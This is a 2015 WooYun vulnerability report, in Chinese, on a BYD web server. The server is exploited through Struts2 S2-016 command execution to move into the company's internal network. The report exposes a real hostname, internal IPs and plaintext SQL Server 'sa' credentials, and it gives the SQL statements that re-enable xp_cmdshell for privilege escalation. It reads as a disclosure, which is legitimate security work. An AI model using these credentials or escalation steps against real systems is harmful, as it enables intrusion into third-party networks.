比亚迪某系统命令执行导致的内网漫游

漏洞概要

缺陷编号:WooYun-2015-097814

漏洞标题:比亚迪某系统命令执行导致的内网漫游

相关厂商:bydauto.com.cn

漏洞作者:氓氓童鞋

提交时间:2015-02-20 19:45

公开时间:2015-04-06 19:46

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-20: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-06: 细节向公众公开

简要描述:

之前提过比亚迪外网可能还有很多服务器存在命令执行找了一下 果然有 而且还可以作为边界服务器漫游内网

详细说明:

http://csm.byd.com.cn/homeAction.actionS2-016

漏洞证明:

创建了个test用户,连接远程桌面进去看了下,有内网IP:

在此台计算上:发现数据库配置信息:<bean destroy-method="close"><!-- SQL Server 2005 for microsoft --><!--<property name="driverClassName" value="com.microsoft.sqlserver.jdbc.SQLServerDriver"/><property name="url" value="jdbc:sqlserver://10.12.3.143(137):1433;databaseName=cms"/>--><!-- SQL Server 2005 for jtds --><property name="driverClassName" value="net.sourceforge.jtds.jdbc.Driver"/><!--正式 --><property name="url" value="jdbc:jtds:sqlserver://10.12.3.137:1433/cms"/><!--测试 --><!-- <property name="url" value="jdbc:jtds:sqlserver://10.12.3.143:1433/cms"/>--><property name="username" value="sa"/><property name="password" value="bydbyd"/>sa权限,提权,遇到阻碍,禁止了cmshell 安全选项直接sa链接进去 执行SQL 恢复了(所以这种加固是不彻底的,不能随意的将sa权限授予普通web用户):EXEC sp_configure 'show advanced options', 1 --RECONFIGURE WITH OVERRIDE --EXEC sp_configure 'xp_cmdshell', 1 --RECONFIGURE WITH OVERRIDE --EXEC sp_configure 'show advanced options', 0 --接着提权,创建test用户 连接:这次应该是到了核心的内网了,看了下附近的服务器情况:

用同样的弱口令对10.12.3.*网段进行扫描:又有两台内网主机可以提权:10.12.3.126 --- sa/bydbyd10.12.3.143 ---sa/bydbyd没再深入了 ~

修复方案:

边界问题的网络配置很重要 运维中的权限也需要加强~请给20rank 谢谢~

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-0213:36

厂商回复:

感谢提供,目前已屏蔽该网站的访问。

最新状态:

暂无

评价